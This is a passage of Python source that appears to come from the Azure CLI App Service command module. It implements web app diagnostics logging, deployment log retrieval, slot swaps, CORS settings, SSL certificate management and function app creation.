if h.ssl_state != SslState.disabled), None)
return ('https' if ssl_host else 'http') + '://' + url
# TODO: expose new blob suport
def config_diagnostics(cmd, resource_group_name, name, level=None,
application_logging=None, web_server_logging=None,
docker_container_logging=None, detailed_error_messages=None,
failed_request_tracing=None, slot=None):
from azure.mgmt.web.models import (FileSystemApplicationLogsConfig, ApplicationLogsConfig,
AzureBlobStorageApplicationLogsConfig, SiteLogsConfig,
HttpLogsConfig, FileSystemHttpLogsConfig,
EnabledConfig)
client = web_client_factory(cmd.cli_ctx)
# TODO: ensure we call get_site only once
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
location = site.location
application_logs = None
if application_logging:
fs_log = None
blob_log = None
level = level if application_logging != 'off' else False
level = True if level is None else level
if application_logging in ['filesystem', 'off']:
fs_log = FileSystemApplicationLogsConfig(level=level)
if application_logging in ['azureblobstorage', 'off']:
blob_log = AzureBlobStorageApplicationLogsConfig(level=level, retention_in_days=3,
sas_url=None)
application_logs = ApplicationLogsConfig(file_system=fs_log,
azure_blob_storage=blob_log)
http_logs = None
server_logging_option = web_server_logging or docker_container_logging
if server_logging_option:
# TODO: az blob storage log config currently not in use, will be impelemented later.
# Tracked as Issue: #4764 on Github
filesystem_log_config = None
turned_on = server_logging_option != 'off'
if server_logging_option in ['filesystem', 'off']:
# 100 mb max log size, retention lasts 3 days. Yes we hard code it, portal does too
filesystem_log_config = FileSystemHttpLogsConfig(retention_in_mb=100, retention_in_days=3,
enabled=turned_on)
http_logs = HttpLogsConfig(file_system=filesystem_log_config, azure_blob_storage=None)
detailed_error_messages_logs = (None if detailed_error_messages is None
else EnabledConfig(enabled=detailed_error_messages))
failed_request_tracing_logs = (None if failed_request_tracing is None
else EnabledConfig(enabled=failed_request_tracing))
site_log_config = SiteLogsConfig(location=location,
application_logs=application_logs,
http_logs=http_logs,
failed_requests_tracing=failed_request_tracing_logs,
detailed_error_messages=detailed_error_messages_logs)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_diagnostic_logs_config',
slot, site_log_config)
def show_diagnostic_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_diagnostic_logs_configuration', slot)
def show_deployment_log(cmd, resource_group, name, slot=None, deployment_id=None):
import urllib3
import requests
scm_url = _get_scm_url(cmd, resource_group, name, slot)
username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))
deployment_log_url = ''
if deployment_id:
deployment_log_url = '{}/api/deployments/{}/log'.format(scm_url, deployment_id)
else:
deployments_url = '{}/api/deployments/'.format(scm_url)
response = requests.get(deployments_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
deployments_url, response.status_code, response.reason))
sorted_logs = sorted(
response.json(),
key=lambda x: x['start_time'],
reverse=True
)
if sorted_logs and sorted_logs[0]:
deployment_log_url = sorted_logs[0].get('log_url', '')
if deployment_log_url:
response = requests.get(deployment_log_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
deployment_log_url, response.status_code, response.reason))
return response.json()
return []
def list_deployment_logs(cmd, resource_group, name, slot=None):
scm_url = _get_scm_url(cmd, resource_group, name, slot)
deployment_log_url = '{}/api/deployments/'.format(scm_url)
username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
import urllib3
headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))
import requests
response = requests.get(deployment_log_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
scm_url, response.status_code, response.reason))
return response.json() or []
def config_slot_auto_swap(cmd, resource_group_name, webapp, slot, auto_swap_slot=None, disable=None):
client = web_client_factory(cmd.cli_ctx)
site_config = client.web_apps.get_configuration_slot(resource_group_name, webapp, slot)
site_config.auto_swap_slot_name = '' if disable else (auto_swap_slot or 'production')
return client.web_apps.update_configuration_slot(resource_group_name, webapp, site_config, slot)
def list_slots(cmd, resource_group_name, webapp):
client = web_client_factory(cmd.cli_ctx)
slots = list(client.web_apps.list_slots(resource_group_name, webapp))
for slot in slots:
slot.name = slot.name.split('/')[-1]
setattr(slot, 'app_service_plan', parse_resource_id(slot.server_farm_id)['name'])
del slot.server_farm_id
return slots
def swap_slot(cmd, resource_group_name, webapp, slot, target_slot=None, preserve_vnet=None, action='swap'):
client = web_client_factory(cmd.cli_ctx)
# Default isPreserveVnet to 'True' if preserve_vnet is 'None'
isPreserveVnet = preserve_vnet if preserve_vnet is not None else 'true'
# converstion from string to Boolean
isPreserveVnet = bool(isPreserveVnet == 'true')
CsmSlotEntity = cmd.get_models('CsmSlotEntity')
slot_swap_entity = CsmSlotEntity(target_slot=target_slot or 'production', preserve_vnet=isPreserveVnet)
if action == 'swap':
poller = client.web_apps.begin_swap_slot(resource_group_name, webapp, slot, slot_swap_entity)
return poller
if action == 'preview':
if slot is None:
result = client.web_apps.apply_slot_config_to_production(resource_group_name, webapp, slot_swap_entity)
else:
result = client.web_apps.apply_slot_configuration_slot(resource_group_name, webapp, slot, slot_swap_entity)
return result
# we will reset both source slot and target slot
if target_slot is None:
client.web_apps.reset_production_slot_config(resource_group_name, webapp)
else:
client.web_apps.reset_slot_configuration_slot(resource_group_name, webapp, target_slot)
return None
def delete_slot(cmd, resource_group_name, webapp, slot):
client = web_client_factory(cmd.cli_ctx)
# TODO: once swagger finalized, expose other parameters like: delete_all_slots, etc...
client.web_apps.delete_slot(resource_group_name, webapp, slot)
def set_traffic_routing(cmd, resource_group_name, name, distribution):
RampUpRule = cmd.get_models('RampUpRule')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
configs = get_site_configs(cmd, resource_group_name, name)
host_name_split = site.default_host_name.split('.', 1)
host_name_suffix = '.' + host_name_split[1]
host_name_val = host_name_split[0]
configs.experiments.ramp_up_rules = []
for r in distribution:
slot, percentage = r.split('=')
action_host_name_slot = host_name_val + "-" + slot
configs.experiments.ramp_up_rules.append(RampUpRule(action_host_name=action_host_name_slot + host_name_suffix,
reroute_percentage=float(percentage),
name=slot))
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', None, configs)
return configs.experiments.ramp_up_rules
def show_traffic_routing(cmd, resource_group_name, name):
configs = get_site_configs(cmd, resource_group_name, name)
return configs.experiments.ramp_up_rules
def clear_traffic_routing(cmd, resource_group_name, name):
set_traffic_routing(cmd, resource_group_name, name, [])
def add_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
from azure.mgmt.web.models import CorsSettings
configs = get_site_configs(cmd, resource_group_name, name, slot)
if not configs.cors:
configs.cors = CorsSettings()
configs.cors.allowed_origins = (configs.cors.allowed_origins or []) + allowed_origins
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return result.cors
def remove_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if configs.cors:
if allowed_origins:
configs.cors.allowed_origins = [x for x in (configs.cors.allowed_origins or []) if x not in allowed_origins]
else:
configs.cors.allowed_origins = []
configs = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return configs.cors
def show_cors(cmd, resource_group_name, name, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
return configs.cors
def get_streaming_log(cmd, resource_group_name, name, provider=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
streaming_url = scm_url + '/logstream'
if provider:
streaming_url += ('/' + provider.lstrip('/'))
user, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
t = threading.Thread(target=_get_log, args=(streaming_url, user, password))
t.daemon = True
t.start()
while True:
time.sleep(100) # so that ctrl+c can stop the command
def download_historical_logs(cmd, resource_group_name, name, log_file=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
url = scm_url.rstrip('/') + '/dump'
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
_get_log(url, user_name, password, log_file)
logger.warning('Downloaded logs to %s', log_file)
def _get_site_credential(cli_ctx, resource_group_name, name, slot=None):
creds = _generic_site_operation(cli_ctx, resource_group_name, name, 'begin_list_publishing_credentials', slot)
creds = creds.result()
return (creds.publishing_user_name, creds.publishing_password)
def _get_log(url, user_name, password, log_file=None):
import certifi
import urllib3
try:
import urllib3.contrib.pyopenssl
urllib3.contrib.pyopenssl.inject_into_urllib3()
except ImportError:
pass
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
r = http.request(
'GET',
url,
headers=headers,
preload_content=False
)
if r.status != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
url, r.status, r.reason))
if log_file: # download logs
with open(log_file, 'wb') as f:
while True:
data = r.read(1024)
if not data:
break
f.write(data)
else: # streaming
std_encoding = sys.stdout.encoding
for chunk in r.stream():
if chunk:
# Extra encode() and decode for stdout which does not surpport 'utf-8'
logger.warning(chunk.decode(encoding='utf-8', errors='replace')
.encode(std_encoding, errors='replace')
.decode(std_encoding, errors='replace')
.rstrip('\n\r')) # each line of log has CRLF.
r.release_conn()
def upload_ssl_cert(cmd, resource_group_name, name, certificate_password, certificate_file, slot=None):
Certificate = cmd.get_models('Certificate')
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
cert_file = open(certificate_file, 'rb')
cert_contents = cert_file.read()
hosting_environment_profile_param = (webapp.hosting_environment_profile.name
if webapp.hosting_environment_profile else '')
thumb_print = _get_cert(certificate_password, certificate_file)
cert_name = _generate_cert_name(thumb_print, hosting_environment_profile_param,
webapp.location, resource_group_name)
cert = Certificate(password=certificate_password, pfx_blob=cert_contents,
location=webapp.location, server_farm_id=webapp.server_farm_id)
return client.certificates.create_or_update(resource_group_name, cert_name, cert)
def _generate_cert_name(thumb_print, hosting_environment, location, resource_group_name):
return "%s_%s_%s_%s" % (thumb_print, hosting_environment, location, resource_group_name)
def _get_cert(certificate_password, certificate_file):
''' Decrypts the .pfx file '''
p12 = OpenSSL.crypto.load_pkcs12(open(certificate_file, 'rb').read(), certificate_password)
cert = p12.get_certificate()
digest_algorithm = 'sha1'
thumbprint = cert.digest(digest_algorithm).decode("utf-8").replace(':', '')
return thumbprint
def list_ssl_certs(cmd, resource_group_name):
client = web_client_factory(cmd.cli_ctx)
return client.certificates.list_by_resource_group(resource_group_name)
def show_ssl_cert(cmd, resource_group_name, certificate_name):
client = web_client_factory(cmd.cli_ctx)
return client.certificates.get(resource_group_name, certificate_name)
def delete_ssl_cert(cmd, resource_group_name, certificate_thumbprint):
client = web_client_factory(cmd.cli_ctx)
webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
return client.certificates.delete(resource_group_name, webapp_cert.name)
raise CLIError("Certificate for thumbprint '{}' not found".format(certificate_thumbprint))
def import_ssl_cert(cmd, resource_group_name, name, key_vault, key_vault_certificate_name):
Certificate = cmd.get_models('Certificate')
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
server_farm_id = webapp.server_farm_id
location = webapp.location
kv_id = None
if not is_valid_resource_id(key_vault):
kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT)
key_vaults = kv_client.vaults.list_by_subscription()
for kv in key_vaults:
if key_vault == kv.name:
kv_id = kv.id
break
else:
kv_id = key_vault
if kv_id is None:
kv_msg = 'The Key Vault {0} was not found in the subscription in context. ' \
'If your Key Vault is in a different subscription, please specify the full Resource ID: ' \
'\naz .. ssl import -n {1} -g {2} --key-vault-certificate-name {3} ' \
'--key-vault /subscriptions/[sub id]/resourceGroups/[rg]/providers/Microsoft.KeyVault/' \
'vaults/{0}'.format(key_vault, name, resource_group_name, key_vault_certificate_name)
logger.warning(kv_msg)
return
kv_id_parts = parse_resource_id(kv_id)
kv_name = kv_id_parts['name']
kv_resource_group_name = kv_id_parts['resource_group']
kv_subscription = kv_id_parts['subscription']
# If in the public cloud, check if certificate is an app service certificate, in the same or a diferent
# subscription
kv_secret_name = None
cloud_type = cmd.cli_ctx.cloud.name
from azure.cli.core.commands.client_factory import get_subscription_id
subscription_id = get_subscription_id(cmd.cli_ctx)
if cloud_type.lower() == PUBLIC_CLOUD.lower():
if kv_subscription.lower() != subscription_id.lower():
diff_subscription_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_APPSERVICE,
subscription_id=kv_subscription)
ascs = diff_subscription_client.app_service_certificate_orders.list()
else:
ascs = client.app_service_certificate_orders.list()
kv_secret_name = None
for asc in ascs:
if asc.name == key_vault_certificate_name:
kv_secret_name = asc.certificates[key_vault_certificate_name].key_vault_secret_name
# if kv_secret_name is not populated, it is not an appservice certificate, proceed for KV certificates
if not kv_secret_name:
kv_secret_name = key_vault_certificate_name
cert_name = '{}-{}-{}'.format(resource_group_name, kv_name, key_vault_certificate_name)
lnk = 'https://azure.github.io/AppService/2016/05/24/Deploying-Azure-Web-App-Certificate-through-Key-Vault.html'
lnk_msg = 'Find more details here: {}'.format(lnk)
if not _check_service_principal_permissions(cmd, kv_resource_group_name, kv_name, kv_subscription):
logger.warning('Unable to verify Key Vault permissions.')
logger.warning('You may need to grant Microsoft.Azure.WebSites service principal the Secret:Get permission')
logger.warning(lnk_msg)
kv_cert_def = Certificate(location=location, key_vault_id=kv_id, password='',
key_vault_secret_name=kv_secret_name, server_farm_id=server_farm_id)
return client.certificates.create_or_update(name=cert_name, resource_group_name=resource_group_name,
certificate_envelope=kv_cert_def)
def create_managed_ssl_cert(cmd, resource_group_name, name, hostname, slot=None):
Certificate = cmd.get_models('Certificate')
hostname = hostname.lower()
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not webapp:
slot_text = "Deployment slot {} in ".format(slot) if slot else ''
raise CLIError("{0}app {1} doesn't exist in resource group {2}".format(slot_text, name, resource_group_name))
parsed_plan_id = parse_resource_id(webapp.server_farm_id)
plan_info = client.app_service_plans.get(parsed_plan_id['resource_group'], parsed_plan_id['name'])
if plan_info.sku.tier.upper() == 'FREE' or plan_info.sku.tier.upper() == 'SHARED':
raise CLIError('Managed Certificate is not supported on Free and Shared tier.')
if not _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot):
slot_text = " --slot {}".format(slot) if slot else ""
raise CLIError("Hostname (custom domain) '{0}' is not registered with {1}. "
"Use 'az webapp config hostname add --resource-group {2} "
"--webapp-name {1}{3} --hostname {0}' "
"to register the hostname.".format(hostname, name, resource_group_name, slot_text))
server_farm_id = webapp.server_farm_id
location = webapp.location
easy_cert_def = Certificate(location=location, canonical_name=hostname,
server_farm_id=server_farm_id, password='')
# TODO: Update manual polling to use LongRunningOperation once backend API & new SDK supports polling
try:
return client.certificates.create_or_update(name=hostname, resource_group_name=resource_group_name,
certificate_envelope=easy_cert_def)
except Exception as ex:
poll_url = ex.response.headers['Location'] if 'Location' in ex.response.headers else None
if ex.response.status_code == 202 and poll_url:
r = send_raw_request(cmd.cli_ctx, method='get', url=poll_url)
poll_timeout = time.time() + 60 * 2 # 2 minute timeout
while r.status_code != 200 and time.time() < poll_timeout:
time.sleep(5)
r = send_raw_request(cmd.cli_ctx, method='get', url=poll_url)
if r.status_code == 200:
try:
return r.json()
except ValueError:
return r.text
logger.warning("Managed Certificate creation in progress. Please use the command "
"'az webapp config ssl show -g %s --certificate-name %s' "
" to view your certificate once it is created", resource_group_name, hostname)
return
raise CLIError(ex)
def _check_service_principal_permissions(cmd, resource_group_name, key_vault_name, key_vault_subscription):
from azure.cli.command_modules.role._client_factory import _graph_client_factory
from azure.graphrbac.models import GraphErrorException
from azure.cli.core.commands.client_factory import get_subscription_id
subscription = get_subscription_id(cmd.cli_ctx)
# Cannot check if key vault is in another subscription
if subscription != key_vault_subscription:
return False
kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT)
vault = kv_client.vaults.get(resource_group_name=resource_group_name, vault_name=key_vault_name)
# Check for Microsoft.Azure.WebSites app registration
AZURE_PUBLIC_WEBSITES_APP_ID = 'abfa0a7c-a6b6-4736-8310-5855508787cd'
AZURE_GOV_WEBSITES_APP_ID = '6a02c803-dafd-4136-b4c3-5a6f318b4714'
graph_sp_client = _graph_client_factory(cmd.cli_ctx).service_principals
for policy in vault.properties.access_policies:
try:
sp = graph_sp_client.get(policy.object_id)
if sp.app_id == AZURE_PUBLIC_WEBSITES_APP_ID or sp.app_id == AZURE_GOV_WEBSITES_APP_ID:
for perm in policy.permissions.secrets:
if perm == "Get":
return True
except GraphErrorException:
pass # Lookup will fail for non service principals (users, groups, etc.)
return False
def _update_host_name_ssl_state(cmd, resource_group_name, webapp_name, webapp,
host_name, ssl_state, thumbprint, slot=None):
Site, HostNameSslState = cmd.get_models('Site', 'HostNameSslState')
updated_webapp = Site(host_name_ssl_states=[HostNameSslState(name=host_name,
ssl_state=ssl_state,
thumbprint=thumbprint,
to_update=True)],
location=webapp.location, tags=webapp.tags)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'begin_create_or_update',
slot, updated_webapp)
def _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise ResourceNotFoundError("'{}' app doesn't exist".format(name))
cert_resource_group_name = parse_resource_id(webapp.server_farm_id)['resource_group']
webapp_certs = client.certificates.list_by_resource_group(cert_resource_group_name)
found_cert = None
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
found_cert = webapp_cert
if not found_cert:
webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
found_cert = webapp_cert
if found_cert:
if len(found_cert.host_names) == 1 and not found_cert.host_names[0].startswith('*'):
return _update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
found_cert.host_names[0], ssl_type,
certificate_thumbprint, slot)
query_result = list_hostnames(cmd, resource_group_name, name, slot)
hostnames_in_webapp = [x.name.split('/')[-1] for x in query_result]
to_update = _match_host_names_from_cert(found_cert.host_names, hostnames_in_webapp)
for h in to_update:
_update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
h, ssl_type, certificate_thumbprint, slot)
return show_webapp(cmd, resource_group_name, name, slot)
raise ResourceNotFoundError("Certificate for thumbprint '{}' not found.".format(certificate_thumbprint))
def bind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
SslState = cmd.get_models('SslState')
return _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint,
SslState.sni_enabled if ssl_type == 'SNI' else SslState.ip_based_enabled, slot)
def unbind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, slot=None):
SslState = cmd.get_models('SslState')
return _update_ssl_binding(cmd, resource_group_name, name,
certificate_thumbprint, SslState.disabled, slot)
def _match_host_names_from_cert(hostnames_from_cert, hostnames_in_webapp):
# the goal is to match '*.foo.com' with host name like 'admin.foo.com', 'logs.foo.com', etc
matched = set()
for hostname in hostnames_from_cert:
if hostname.startswith('*'):
for h in hostnames_in_webapp:
if hostname[hostname.find('.'):] == h[h.find('.'):]:
matched.add(h)
elif hostname in hostnames_in_webapp:
matched.add(hostname)
return matched
# help class handles runtime stack in format like 'node|6.1', 'php|5.5'
class _StackRuntimeHelper:
def __init__(self, cmd, client, linux=False):
self._cmd = cmd
self._client = client
self._linux = linux
self._stacks = []
@staticmethod
def remove_delimiters(runtime):
import re
# delimiters allowed: '|', ':'
if '|' in runtime:
runtime = re.split('[|]', runtime)
elif ':' in runtime:
runtime = re.split('[:]', runtime)
else:
runtime = [runtime]
return '|'.join(filter(None, runtime))
def resolve(self, display_name):
self._load_stacks_hardcoded()
return next((s for s in self._stacks if s['displayName'].lower() == display_name.lower()),
None)
@property
def stacks(self):
self._load_stacks_hardcoded()
return self._stacks
@staticmethod
def update_site_config(stack, site_config, cmd=None):
for k, v in stack['configs'].items():
setattr(site_config, k, v)
return site_config
@staticmethod
def update_site_appsettings(cmd, stack, site_config):
NameValuePair = cmd.get_models('NameValuePair')
if site_config.app_settings is None:
site_config.app_settings = []
for k, v in stack['configs'].items():
already_in_appsettings = False
for app_setting in site_config.app_settings:
if app_setting.name == k:
already_in_appsettings = True
app_setting.value = v
if not already_in_appsettings:
site_config.app_settings.append(NameValuePair(name=k, value=v))
return site_config
def _load_stacks_hardcoded(self):
if self._stacks:
return
result = []
if self._linux:
result = get_file_json(RUNTIME_STACKS)['linux']
for r in result:
r['setter'] = _StackRuntimeHelper.update_site_config
else: # Windows stacks
result = get_file_json(RUNTIME_STACKS)['windows']
for r in result:
r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
r['displayName'] else _StackRuntimeHelper.update_site_config)
self._stacks = result
# Currently using hardcoded values instead of this function. This function calls the stacks API;
# Stacks API is updated with Antares deployments,
# which are infrequent and don't line up with stacks EOL schedule.
def _load_stacks(self):
if self._stacks:
return
os_type = ('Linux' if self._linux else 'Windows')
raw_stacks = self._client.provider.get_available_stacks(os_type_selected=os_type, raw=True)
bytes_value = raw_stacks._get_next().content # pylint: disable=protected-access
json_value = bytes_value.decode('utf8')
json_stacks = json.loads(json_value)
stacks = json_stacks['value']
result = []
if self._linux:
for properties in [(s['properties']) for s in stacks]:
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
})
else: # Windows stacks
config_mappings = {
'node': 'WEBSITE_NODE_DEFAULT_VERSION',
'python': 'python_version',
'php': 'php_version',
'aspnet': 'net_framework_version'
}
# get all stack version except 'java'
for stack in stacks:
if stack['name'] not in config_mappings:
continue
name, properties = stack['name'], stack['properties']
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': name + '|' + major['displayVersion'],
'configs': {
config_mappings[name]: (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
}
})
# deal with java, which pairs with java container version
java_stack = next((s for s in stacks if s['name'] == 'java'))
java_container_stack = next((s for s in stacks if s['name'] == 'javaContainers'))
for java_version in java_stack['properties']['majorVersions']:
for fx in java_container_stack['properties']['frameworks']:
for fx_version in fx['majorVersions']:
result.append({
'displayName': 'java|{}|{}|{}'.format(java_version['displayVersion'],
fx['display'],
fx_version['displayVersion']),
'configs': {
'java_version': java_version['runtimeVersion'],
'java_container': fx['name'],
'java_container_version': fx_version['runtimeVersion']
}
})
for r in result:
r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
r['displayName'] else _StackRuntimeHelper.update_site_config)
self._stacks = result
def get_app_insights_key(cli_ctx, resource_group, name):
appinsights_client = get_mgmt_service_client(cli_ctx, ApplicationInsightsManagementClient)
appinsights = appinsights_client.components.get(resource_group, name)
if appinsights is None or appinsights.instrumentation_key is None:
raise CLIError("App Insights {} under resource group {} was not found.".format(name, resource_group))
return appinsights.instrumentation_key
def create_functionapp_app_service_plan(cmd, resource_group_name, name, is_linux, sku,
number_of_workers=None, max_burst=None, location=None, tags=None):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
sku = _normalize_sku(sku)
tier = get_sku_name(sku)
if max_burst is not None:
if tier.lower() != "elasticpremium":
raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-elastic-worker-count',
number_of_workers, min_val=0, max_val=20)
client = web_client_factory(cmd.cli_ctx)
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
sku_def = SkuDescription(tier=tier, name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), maximum_elastic_worker_count=max_burst,
hyper_v=None, name=name)
return client.app_service_plans.begin_create_or_update(resource_group_name, name, plan_def)
def is_plan_consumption(cmd, plan_info):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier.lower() == 'dynamic'
return False
def is_plan_elastic_premium(cmd, plan_info):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier == 'ElasticPremium'
return False
def validate_and_convert_to_int(flag, val):
try:
return int(val)
except ValueError:
raise CLIError("Usage error: {} is expected to have an int value.".format(flag))
def validate_range_of_int_flag(flag_name, value, min_val, max_val):
value = validate_and_convert_to_int(flag_name, value)
if min_val > value or value > max_val:
raise CLIError("Usage error: {} is expected to be between {} and {} (inclusive)".format(flag_name, min_val,
max_val))
return value
def create_function(cmd, resource_group_name, name, storage_account, plan=None,
os_type=None, functions_version=None, runtime=None, runtime_version=None,
consumption_plan_location=None, app_insights=None, app_insights_key=None,
disable_app_insights=None, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None,
docker_registry_server_password=None, docker_registry_server_user=None,
deployment_container_image_name=None, tags=None, assign_identities=None,
role='Contributor', scope=None):
# pylint: disable=too-many-statements, too-many-branches
if functions_version is None:
logger.warning("No functions version specified so defaulting to 2. In the future, specifying a version will "
"be required. To create a 2.x function you would pass in the flag `--functions-version 2`")
functions_version = '2'
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
if bool(plan) == bool(consumption_plan_location):
raise CLIError("usage error: --plan NAME_OR_ID | --consumption-plan-location LOCATION")
SiteConfig, Site, NameValuePair = cmd.get_models('SiteConfig', 'Site', 'NameValuePair')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
disable_app_insights = (disable_app_insights == "true")
site_config = SiteConfig(app_settings=[])
functionapp_def = Site(location=None, site_config=site_config, tags=tags)
KEYS = FUNCTIONS_STACKS_API_KEYS()
client = web_client_factory(cmd.cli_ctx)
plan_info = None
if runtime is not None:
runtime = runtime.lower()
if consumption_plan_location:
locations = list_consumption_locations(cmd)
location = next((loc for loc in locations if loc['name'].lower() == consumption_plan_location.lower()), None)
if location is None:
raise CLIError("Location is invalid. Use: az functionapp list-consumption-locations")
functionapp_def.location = consumption_plan_location
functionapp_def.kind = 'functionapp'
# if os_type is None, the os type is windows
is_linux = os_type and os_type.lower() == 'linux'
else: # apps with SKU based plan
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist".format(plan))
location = plan_info.location
is_linux = plan_info.reserved
functionapp_def.server_farm_id = plan
functionapp_def.location = location
if functions_version == '2' and functionapp_def.location in FUNCTIONS_NO_V2_REGIONS:
raise CLIError("2.x functions are not supported in this region. To create a 3.x function, "
"pass in the flag '--functions-version 3'")
if is_linux and not runtime and (consumption_plan_location or not deployment_container_image_name):
raise CLIError(
"usage error: --runtime RUNTIME required for linux functions apps without custom image.")
runtime_stacks_json = _load_runtime_stacks_json_functionapp(is_linux)
if runtime is None and runtime_version is not None:
raise CLIError('Must specify --runtime to use --runtime-version')
# get the matching runtime stack object
runtime_json = _get_matching_runtime_json_functionapp(runtime_stacks_json, runtime if runtime else 'dotnet')
if not runtime_json:
# no matching runtime for os
os_string = "linux" if is_linux else "windows"
supported_runtimes = list(map(lambda x: x[KEYS.NAME], runtime_stacks_json))
raise CLIError("usage error: Currently supported runtimes (--runtime) in {} function apps are: {}."
.format(os_string, ', '.join(supported_runtimes)))
runtime_version_json = _get_matching_runtime_version_json_functionapp(runtime_json,
functions_version,
runtime_version,
is_linux)
if not runtime_version_json:
supported_runtime_versions = list(map(lambda x: x[KEYS.DISPLAY_VERSION],
_get_supported_runtime_versions_functionapp(runtime_json,
functions_version)))
if runtime_version:
if runtime == 'dotnet':
raise CLIError('--runtime-version is not supported for --runtime dotnet. Dotnet version is determined '
'by --functions-version. Dotnet version {} is not supported by Functions version {}.'
.format(runtime_version, functions_version))
raise CLIError('--runtime-version {} is not supported for the selected --runtime {} and '
'--functions-version {}. Supported versions are: {}.'
.format(runtime_version,
runtime,
functions_version,
', '.join(supported_runtime_versions)))
# if runtime_version was not specified, then that runtime is not supported for that functions version
raise CLIError('no supported --runtime-version found for the selected --runtime {} and '
'--functions-version {}'
.format(runtime, functions_version))
if runtime == 'dotnet':
logger.warning('--runtime-version is not supported for --runtime dotnet. Dotnet version is determined by '
'--functions-version. Dotnet version will be %s for this function app.',
runtime_version_json[KEYS.DISPLAY_VERSION])
if runtime_version_json[KEYS.IS_DEPRECATED]:
logger.warning('%s version %s has been deprecated. In the future, this version will be unavailable. '
'Please update your command to use a more recent version. For a list of supported '
'--runtime-versions, run \"az functionapp create -h\"',
runtime_json[KEYS.PROPERTIES][KEYS.DISPLAY], runtime_version_json[KEYS.DISPLAY_VERSION])
